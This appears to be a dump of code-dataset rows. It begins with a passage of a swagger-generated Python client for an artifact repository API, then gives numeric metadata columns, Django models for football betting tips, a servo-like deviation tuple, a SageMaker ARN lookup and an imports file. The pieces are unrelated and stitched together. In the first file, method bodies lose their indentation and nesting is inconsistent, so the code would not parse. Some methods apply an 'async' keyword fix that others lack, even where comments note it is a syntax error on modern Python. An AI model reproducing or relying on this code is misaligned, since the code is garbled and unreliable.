    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method collections_collectionid_artifacts_artifactid_put" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'collectionid' is set
    if ('collectionid' not in params or
            params['collectionid'] is None):
        raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_artifacts_artifactid_put`")  # noqa: E501
    # verify the required parameter 'artifactid' is set
    if ('artifactid' not in params or
            params['artifactid'] is None):
        raise ValueError("Missing the required parameter `artifactid` when calling `collections_collectionid_artifacts_artifactid_put`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'collectionid' in params:
        path_params['collectionid'] = params['collectionid']  # noqa: E501
    if 'artifactid' in params:
        path_params['artifactid'] = params['artifactid']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    if 'committed' in params:
        form_params.append(('committed', params['committed']))  # noqa: E501
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['multipart/form-data'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # BUGFIX: `async` became a reserved keyword in Python 3.7, so the
    # generated `async=params.get('async')` keyword argument is a
    # SyntaxError on modern interpreters.  Passing it via dict unpacking
    # preserves the exact call contract while staying parseable.
    return self.api_client.call_api(
        '/collections/{collectionid}/artifacts/{artifactid}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Artifact',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def collections_collectionid_artifacts_post(self, collectionid, auid, uri, content, **kwargs):  # noqa: E501
    """Create an artifact  # noqa: E501

    Synchronous by default; pass async=True to get the request thread
    instead (call ``thread.get()`` for the result).

    :param async bool
    :param str collectionid: Collection containing the artifact (required)
    :param str auid: Archival Unit ID (AUID) of new artifact (required)
    :param str uri: URI represented by this artifact (required)
    :param file content: Content byte stream (required)
    :param file aspect_parts: URI aspects represented by this artifact
    :return: Artifact, or the request thread when called asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths delegate to the same implementation;
    # the async flag is simply forwarded through **kwargs.
    impl = self.collections_collectionid_artifacts_post_with_http_info
    return impl(collectionid, auid, uri, content, **kwargs)  # noqa: E501
def collections_collectionid_artifacts_post_with_http_info(self, collectionid, auid, uri, content, **kwargs):  # noqa: E501
    """Create an artifact  # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async=True

    >>> thread = api.collections_collectionid_artifacts_post_with_http_info(collectionid, auid, uri, content, async=True)
    >>> result = thread.get()

    :param async bool
    :param str collectionid: Collection containing the artifact (required)
    :param str auid: Archival Unit ID (AUID) of new artifact (required)
    :param str uri: URI represented by this artifact (required)
    :param file content: Content byte stream (required)
    :param file aspect_parts: URI aspects represented by this artifact
    :return: Artifact
        If the method is called asynchronously,
        returns the request thread.
    """
    all_params = ['collectionid', 'auid', 'uri', 'content', 'aspect_parts']  # noqa: E501
    all_params.append('async')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method collections_collectionid_artifacts_post" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'collectionid' is set
    if ('collectionid' not in params or
            params['collectionid'] is None):
        raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_artifacts_post`")  # noqa: E501
    # verify the required parameter 'auid' is set
    if ('auid' not in params or
            params['auid'] is None):
        raise ValueError("Missing the required parameter `auid` when calling `collections_collectionid_artifacts_post`")  # noqa: E501
    # verify the required parameter 'uri' is set
    if ('uri' not in params or
            params['uri'] is None):
        raise ValueError("Missing the required parameter `uri` when calling `collections_collectionid_artifacts_post`")  # noqa: E501
    # verify the required parameter 'content' is set
    if ('content' not in params or
            params['content'] is None):
        raise ValueError("Missing the required parameter `content` when calling `collections_collectionid_artifacts_post`")  # noqa: E501
    collection_formats = {}
    path_params = {}
    if 'collectionid' in params:
        path_params['collectionid'] = params['collectionid']  # noqa: E501
    query_params = []
    header_params = {}
    form_params = []
    local_var_files = {}
    if 'auid' in params:
        form_params.append(('auid', params['auid']))  # noqa: E501
    if 'uri' in params:
        form_params.append(('uri', params['uri']))  # noqa: E501
    if 'content' in params:
        local_var_files['content'] = params['content']  # noqa: E501
    if 'aspect_parts' in params:
        local_var_files['aspectParts'] = params['aspect_parts']  # noqa: E501
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501
    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['multipart/form-data'])  # noqa: E501
    # Authentication setting
    auth_settings = []  # noqa: E501
    # BUGFIX: `async` became a reserved keyword in Python 3.7, so the
    # generated `async=params.get('async')` keyword argument is a
    # SyntaxError on modern interpreters.  Passing it via dict unpacking
    # preserves the exact call contract while staying parseable.
    return self.api_client.call_api(
        '/collections/{collectionid}/artifacts', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='Artifact',  # noqa: E501
        auth_settings=auth_settings,
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats,
        **{'async': params.get('async')})
def collections_collectionid_aus_auid_artifacts_get(self, collectionid, auid, **kwargs):  # noqa: E501
    """Get committed artifacts in a collection and Archival Unit  # noqa: E501

    Synchronous by default; pass async=True to get the request thread
    instead (call ``thread.get()`` for the result).

    :param async bool
    :param str collectionid: Identifier of the collection containing the artifacts (required)
    :param str auid: Identifier of the Archival Unit containing the artifacts (required)
    :param str url: The URL contained by the artifacts
    :param str url_prefix: The prefix to be matched by the artifact URLs
    :param str version: The version of the URL contained by the artifacts
    :return: list[Artifact], or the request thread when called
        asynchronously.
    """
    kwargs['_return_http_data_only'] = True
    # Both the sync and async paths delegate to the same implementation;
    # the async flag is simply forwarded through **kwargs.
    impl = self.collections_collectionid_aus_auid_artifacts_get_with_http_info
    return impl(collectionid, auid, **kwargs)  # noqa: E501
    def collections_collectionid_aus_auid_artifacts_get_with_http_info(self, collectionid, auid, **kwargs):  # noqa: E501
        """Get committed artifacts in a collection and Archival Unit  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.collections_collectionid_aus_auid_artifacts_get_with_http_info(collectionid, auid, async=True)
        >>> result = thread.get()
        :param async bool
        :param str collectionid: Identifier of the collection containing the artifacts (required)
        :param str auid: Identifier of the Archival Unit containing the artifacts (required)
        :param str url: The URL contained by the artifacts
        :param str url_prefix: The prefix to be matched by the artifact URLs
        :param str version: The version of the URL contained by the artifacts
        :return: list[Artifact]
        If the method is called asynchronously,
        returns the request thread.
        """
        # Whitelist of keyword arguments this endpoint accepts; anything else
        # raises TypeError below.
        all_params = ['collectionid', 'auid', 'url', 'url_prefix', 'version']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots this frame's variables (collectionid, auid and
        # 'kwargs' itself); validated keyword arguments are then merged into
        # the same dict. Do not rename these locals.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method collections_collectionid_aus_auid_artifacts_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'collectionid' is set
        if ('collectionid' not in params or
                params['collectionid'] is None):
            raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_aus_auid_artifacts_get`")  # noqa: E501
        # verify the required parameter 'auid' is set
        if ('auid' not in params or
                params['auid'] is None):
            raise ValueError("Missing the required parameter `auid` when calling `collections_collectionid_aus_auid_artifacts_get`")  # noqa: E501
        collection_formats = {}
        # Path placeholders for /collections/{collectionid}/aus/{auid}/artifacts.
        path_params = {}
        if 'collectionid' in params:
            path_params['collectionid'] = params['collectionid']  # noqa: E501
        if 'auid' in params:
            path_params['auid'] = params['auid']  # noqa: E501
        # Optional query filters; note the Python name url_prefix maps to the
        # wire-level query key 'urlPrefix'.
        query_params = []
        if 'url' in params:
            query_params.append(('url', params['url']))  # noqa: E501
        if 'url_prefix' in params:
            query_params.append(('urlPrefix', params['url_prefix']))  # noqa: E501
        if 'version' in params:
            query_params.append(('version', params['version']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None  # GET request: no body
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting (none for this endpoint)
        auth_settings = []  # noqa: E501
        # NOTE(review): 'async' became a reserved word in Python 3.7, so the
        # 'async=' keyword below only parses on Python 2 / <= 3.6. This is
        # swagger-generated code; newer generators rename it to 'async_req'.
        return self.api_client.call_api(
            '/collections/{collectionid}/aus/{auid}/artifacts', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[Artifact]',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def collections_collectionid_aus_auid_size_get(self, collectionid, auid, **kwargs): # noqa: E501
"""Get the size of Archival Unit artifacts in a collection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_aus_auid_size_get(collectionid, auid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Identifier of the collection containing the artifacts (required)
:param str auid: Identifier of the Archival Unit containing the artifacts (required)
:param str url: The URL contained by the artifacts
:param str url_prefix: The prefix to be matched by the artifact URLs
:param str version: The version of the URL contained by the artifacts
:return: int
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.collections_collectionid_aus_auid_size_get_with_http_info(collectionid, auid, **kwargs) # noqa: E501
else:
(data) = self.collections_collectionid_aus_auid_size_get_with_http_info(collectionid, auid, **kwargs) # noqa: E501
return data
    def collections_collectionid_aus_auid_size_get_with_http_info(self, collectionid, auid, **kwargs):  # noqa: E501
        """Get the size of Archival Unit artifacts in a collection  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.collections_collectionid_aus_auid_size_get_with_http_info(collectionid, auid, async=True)
        >>> result = thread.get()
        :param async bool
        :param str collectionid: Identifier of the collection containing the artifacts (required)
        :param str auid: Identifier of the Archival Unit containing the artifacts (required)
        :param str url: The URL contained by the artifacts
        :param str url_prefix: The prefix to be matched by the artifact URLs
        :param str version: The version of the URL contained by the artifacts
        :return: int
        If the method is called asynchronously,
        returns the request thread.
        """
        # Whitelist of keyword arguments this endpoint accepts; anything else
        # raises TypeError below.
        all_params = ['collectionid', 'auid', 'url', 'url_prefix', 'version']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots this frame's variables (collectionid, auid and
        # 'kwargs' itself); validated keyword arguments are then merged into
        # the same dict. Do not rename these locals.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method collections_collectionid_aus_auid_size_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'collectionid' is set
        if ('collectionid' not in params or
                params['collectionid'] is None):
            raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_aus_auid_size_get`")  # noqa: E501
        # verify the required parameter 'auid' is set
        if ('auid' not in params or
                params['auid'] is None):
            raise ValueError("Missing the required parameter `auid` when calling `collections_collectionid_aus_auid_size_get`")  # noqa: E501
        collection_formats = {}
        # Path placeholders for /collections/{collectionid}/aus/{auid}/size.
        path_params = {}
        if 'collectionid' in params:
            path_params['collectionid'] = params['collectionid']  # noqa: E501
        if 'auid' in params:
            path_params['auid'] = params['auid']  # noqa: E501
        # Optional query filters; note the Python name url_prefix maps to the
        # wire-level query key 'urlPrefix'.
        query_params = []
        if 'url' in params:
            query_params.append(('url', params['url']))  # noqa: E501
        if 'url_prefix' in params:
            query_params.append(('urlPrefix', params['url_prefix']))  # noqa: E501
        if 'version' in params:
            query_params.append(('version', params['version']))  # noqa: E501
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None  # GET request: no body
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting (none for this endpoint)
        auth_settings = []  # noqa: E501
        # NOTE(review): 'async' became a reserved word in Python 3.7, so the
        # 'async=' keyword below only parses on Python 2 / <= 3.6. This is
        # swagger-generated code; newer generators rename it to 'async_req'.
        return self.api_client.call_api(
            '/collections/{collectionid}/aus/{auid}/size', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='int',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def collections_collectionid_aus_get(self, collectionid, **kwargs): # noqa: E501
"""Get Archival Unit IDs (AUIDs) in a collection # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_collectionid_aus_get(collectionid, async=True)
>>> result = thread.get()
:param async bool
:param str collectionid: Identifier of the collection containing the Archival Units (required)
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.collections_collectionid_aus_get_with_http_info(collectionid, **kwargs) # noqa: E501
else:
(data) = self.collections_collectionid_aus_get_with_http_info(collectionid, **kwargs) # noqa: E501
return data
    def collections_collectionid_aus_get_with_http_info(self, collectionid, **kwargs):  # noqa: E501
        """Get Archival Unit IDs (AUIDs) in a collection  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.collections_collectionid_aus_get_with_http_info(collectionid, async=True)
        >>> result = thread.get()
        :param async bool
        :param str collectionid: Identifier of the collection containing the Archival Units (required)
        :return: list[str]
        If the method is called asynchronously,
        returns the request thread.
        """
        # Whitelist of keyword arguments this endpoint accepts; anything else
        # raises TypeError below.
        all_params = ['collectionid']  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots this frame's variables (collectionid and
        # 'kwargs' itself); validated keyword arguments are then merged into
        # the same dict. Do not rename these locals.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method collections_collectionid_aus_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'collectionid' is set
        if ('collectionid' not in params or
                params['collectionid'] is None):
            raise ValueError("Missing the required parameter `collectionid` when calling `collections_collectionid_aus_get`")  # noqa: E501
        collection_formats = {}
        # Path placeholder for /collections/{collectionid}/aus.
        path_params = {}
        if 'collectionid' in params:
            path_params['collectionid'] = params['collectionid']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None  # GET request: no body
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting (none for this endpoint)
        auth_settings = []  # noqa: E501
        # NOTE(review): 'async' became a reserved word in Python 3.7, so the
        # 'async=' keyword below only parses on Python 2 / <= 3.6. This is
        # swagger-generated code; newer generators rename it to 'async_req'.
        return self.api_client.call_api(
            '/collections/{collectionid}/aus', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[str]',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def collections_get(self, **kwargs): # noqa: E501
"""Get collection identifiers of the committed artifacts in the repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.collections_get(async=True)
>>> result = thread.get()
:param async bool
:return: list[str]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.collections_get_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.collections_get_with_http_info(**kwargs) # noqa: E501
return data
    def collections_get_with_http_info(self, **kwargs):  # noqa: E501
        """Get collection identifiers of the committed artifacts in the repository  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async=True
        >>> thread = api.collections_get_with_http_info(async=True)
        >>> result = thread.get()
        :param async bool
        :return: list[str]
        If the method is called asynchronously,
        returns the request thread.
        """
        # No endpoint-specific parameters; only the framework-level keyword
        # arguments appended below are accepted.
        all_params = []  # noqa: E501
        all_params.append('async')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        # locals() snapshots this frame's variables (here just 'kwargs');
        # validated keyword arguments are then merged into the same dict.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method collections_get" % key
                )
            params[key] = val
        del params['kwargs']
        collection_formats = {}
        path_params = {}
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None  # GET request: no body
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # Authentication setting (none for this endpoint)
        auth_settings = []  # noqa: E501
        # NOTE(review): 'async' became a reserved word in Python 3.7, so the
        # 'async=' keyword below only parses on Python 2 / <= 3.6. This is
        # swagger-generated code; newer generators rename it to 'async_req'.
        return self.api_client.call_api(
            '/collections', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='list[str]',  # noqa: E501
            auth_settings=auth_settings,
            async=params.get('async'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| 43.964892
| 159
| 0.635378
| 4,277
| 38,821
| 5.55062
| 0.04606
| 0.04246
| 0.056613
| 0.024263
| 0.965333
| 0.956024
| 0.952275
| 0.945324
| 0.936647
| 0.926411
| 0
| 0.013794
| 0.279153
| 38,821
| 882
| 160
| 44.014739
| 0.834548
| 0.06275
| 0
| 0.783058
| 0
| 0
| 0.21982
| 0.077515
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.008264
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
315746974e69f625bc7caafc3ff172ff3f8ede0a
| 172
|
py
|
Python
|
collection_G/machine_learning/__init__.py
|
STomoya/collection_G
|
5ffbdb47d4f8c27fa6eef4b6f769fe5ae4598f9f
|
[
"MIT"
] | null | null | null |
collection_G/machine_learning/__init__.py
|
STomoya/collection_G
|
5ffbdb47d4f8c27fa6eef4b6f769fe5ae4598f9f
|
[
"MIT"
] | null | null | null |
collection_G/machine_learning/__init__.py
|
STomoya/collection_G
|
5ffbdb47d4f8c27fa6eef4b6f769fe5ae4598f9f
|
[
"MIT"
] | null | null | null |
from .keras import plot_keras_history
from .sklearn import split_data
from .sklearn import encode_target
from .sklearn import plot_confusion_matrix
from . import pytorch
| 21.5
| 42
| 0.843023
| 25
| 172
| 5.56
| 0.52
| 0.23741
| 0.366906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127907
| 172
| 8
| 43
| 21.5
| 0.926667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
315f2bef3e17c7a64506f51d88cafc1ec609e079
| 2,523
|
py
|
Python
|
jackpot/models.py
|
clonetech/jackpotsone
|
512d018f431eef7649712ad9c9e8e40d99ddd00c
|
[
"BSD-3-Clause"
] | null | null | null |
jackpot/models.py
|
clonetech/jackpotsone
|
512d018f431eef7649712ad9c9e8e40d99ddd00c
|
[
"BSD-3-Clause"
] | 3
|
2020-06-05T18:28:06.000Z
|
2021-06-10T20:33:26.000Z
|
jackpot/models.py
|
clonetech/jackpotsone
|
512d018f431eef7649712ad9c9e8e40d99ddd00c
|
[
"BSD-3-Clause"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
import datetime
from django.conf import settings
from django.urls import reverse
from django.db.models.signals import post_save
from django.dispatch import receiver
class Punter(models.Model):
    """A single match tip: the fixture, the predicted outcome and whether
    the tip is still running, won or lost."""
    # When the tip was published.
    published_date = models.DateTimeField('Date Published')
    # Country/league of the fixture and the two teams involved.
    country = models.CharField(max_length = 200)
    home_team = models.CharField(max_length = 200)
    home_score = models.IntegerField(default = 0)
    away_score = models.IntegerField(default = 0)
    away_team = models.CharField(max_length = 200)
    # The tipped outcome (free-form text).
    prediction = models.CharField(max_length = 100)
    # Lifecycle of the tip; stored value and display label are identical.
    status = models.CharField(max_length = 100, choices=[('Running','Running'),('Won','Won'),('Lost','Lost')])
    def __str__(self):
        # Represent the tip by its home team (e.g. in the Django admin).
        return self.home_team
class Hexabet(models.Model):
    """A "hexabet" tip: same shape as Punter plus a free-form safety note."""
    # When the tip was published.
    published_date = models.DateTimeField('Date Published')
    # Country/league of the fixture and the two teams involved.
    country = models.CharField(max_length = 200)
    home_team = models.CharField(max_length = 200)
    home_score = models.IntegerField(default = 0)
    away_score = models.IntegerField(default = 0)
    away_team = models.CharField(max_length = 200)
    # Extra qualifier for the tip; empty by default.
    safety = models.CharField(max_length = 200, default="")
    # The tipped outcome (free-form text).
    prediction = models.CharField(max_length = 100)
    # Lifecycle of the tip; stored value and display label are identical.
    status = models.CharField(max_length = 100, choices=[('Running','Running'),('Won','Won'),('Lost','Lost')])
    def __str__(self):
        # Represent the tip by its home team (e.g. in the Django admin).
        return self.home_team
class Singlebet(models.Model):
    """A single-bet tip; field-for-field identical to Hexabet but stored in
    its own table."""
    # When the tip was published.
    published_date = models.DateTimeField('Date Published')
    # Country/league of the fixture and the two teams involved.
    country = models.CharField(max_length = 200)
    home_team = models.CharField(max_length = 200)
    home_score = models.IntegerField(default = 0)
    away_score = models.IntegerField(default = 0)
    away_team = models.CharField(max_length = 200)
    # Extra qualifier for the tip; empty by default.
    safety = models.CharField(max_length = 200, default="")
    # The tipped outcome (free-form text).
    prediction = models.CharField(max_length = 100)
    # Lifecycle of the tip; stored value and display label are identical.
    status = models.CharField(max_length = 100, choices=[('Running','Running'),('Won','Won'),('Lost','Lost')])
    def __str__(self):
        # Represent the tip by its home team (e.g. in the Django admin).
        return self.home_team
class Jackpot(models.Model):
    """One fixture of a jackpot slip; unlike the other tip models it carries
    no score/status fields, just the fixture and prediction."""
    # When the entry was published.
    published_date = models.DateTimeField('Date Published')
    # Optional long-form description of the entry.
    content = models.TextField(null=True, blank=True)
    # Position/number of the fixture on the jackpot slip (stored as text).
    no = models.CharField(max_length = 200, default="")
    # Country/league of the fixture and the two teams involved.
    country = models.CharField(max_length = 200)
    home_team = models.CharField(max_length = 200)
    away_team = models.CharField(max_length = 200)
    # The tipped outcome (free-form text).
    prediction = models.CharField(max_length = 100)
    def __str__(self):
        # Represent the entry by its home team (e.g. in the Django admin).
        return self.home_team
| 38.815385
| 110
| 0.717004
| 317
| 2,523
| 5.514196
| 0.18612
| 0.188787
| 0.226545
| 0.30206
| 0.825515
| 0.825515
| 0.806064
| 0.790046
| 0.758009
| 0.758009
| 0
| 0.034026
| 0.161316
| 2,523
| 64
| 111
| 39.421875
| 0.79206
| 0
| 0
| 0.735849
| 0
| 0
| 0.05549
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075472
| false
| 0
| 0.150943
| 0.075472
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
31861d3a31bc5021eb63adc8dfe1430e7abf184c
| 49
|
py
|
Python
|
server/server/LeConf.py
|
JackZxj/RoboticDigitalTwin
|
e74db961c1562eb770e5093f74f3aa8167a2f05b
|
[
"MIT"
] | 7
|
2020-07-27T12:33:18.000Z
|
2021-11-06T09:30:32.000Z
|
server/server/LeConf.py
|
JackZxj/RoboticDigitalTwin
|
e74db961c1562eb770e5093f74f3aa8167a2f05b
|
[
"MIT"
] | null | null | null |
server/server/LeConf.py
|
JackZxj/RoboticDigitalTwin
|
e74db961c1562eb770e5093f74f3aa8167a2f05b
|
[
"MIT"
] | 6
|
2020-07-07T01:11:53.000Z
|
2021-04-23T03:44:44.000Z
|
# Six identical deviation values of 1500 -- presumably one per servo/joint
# channel (TODO confirm against the consumer of LeConf.Deviation). Written
# as a repetition so the uniformity is explicit.
Deviation = (1500,) * 6
| 24.5
| 48
| 0.673469
| 7
| 49
| 4.714286
| 0.285714
| 1.212121
| 1.454545
| 1.454545
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0
| 0.585366
| 0.163265
| 49
| 1
| 49
| 49
| 0.219512
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
31a5a30aedbccf05973ef45df8a5ab9818462fa5
| 2,124
|
py
|
Python
|
aws_marketplace/using_model_packages/amazon_demo_product/src/scikit_product_arns.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 2,610
|
2020-10-01T14:14:53.000Z
|
2022-03-31T18:02:31.000Z
|
aws_marketplace/using_model_packages/amazon_demo_product/src/scikit_product_arns.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 1,959
|
2020-09-30T20:22:42.000Z
|
2022-03-31T23:58:37.000Z
|
aws_marketplace/using_model_packages/amazon_demo_product/src/scikit_product_arns.py
|
jerrypeng7773/amazon-sagemaker-examples
|
c5ddecce1f739a345465b9a38b064983a129141d
|
[
"Apache-2.0"
] | 2,052
|
2020-09-30T22:11:46.000Z
|
2022-03-31T23:02:51.000Z
|
class ScikitArnProvider:
    """Provides the region-specific SageMaker model-package ARN for the
    scikit iris detector demo product."""

    # Every regional copy of the model package shares the same name; only the
    # region and the AWS account hosting the package differ, so the full ARNs
    # are derived from this table instead of being spelled out 13 times.
    _PACKAGE_NAME = "scikit-iris-detector-154230595-8f00905c1f927a512b73ea29dd09ae30"
    _ACCOUNT_BY_REGION = {
        "ap-south-1": "077584701553",
        "ap-northeast-2": "745090734665",
        "ap-southeast-1": "192199979996",
        "ap-southeast-2": "666831318237",
        "ap-northeast-1": "977537786026",
        "ca-central-1": "470592106596",
        "eu-central-1": "446921602837",
        "eu-west-1": "985815980388",
        "eu-west-2": "856760150666",
        "us-east-1": "865070037744",
        "us-east-2": "057799348421",
        "us-west-1": "382657785993",
        "us-west-2": "594846645681",
    }

    @staticmethod
    def get_model_package_arn(current_region):
        """Return the model-package ARN for ``current_region``.

        :param current_region: AWS region name, e.g. ``"us-east-1"``.
        :return: the full ``arn:aws:sagemaker:...:model-package/...`` string.
        :raises KeyError: if the product is not offered in that region
            (same behavior as the original hard-coded mapping).
        """
        account = ScikitArnProvider._ACCOUNT_BY_REGION[current_region]
        return "arn:aws:sagemaker:{}:{}:model-package/{}".format(
            current_region, account, ScikitArnProvider._PACKAGE_NAME
        )
| 106.2
| 156
| 0.760829
| 236
| 2,124
| 6.826271
| 0.186441
| 0.104283
| 0.121043
| 0.177529
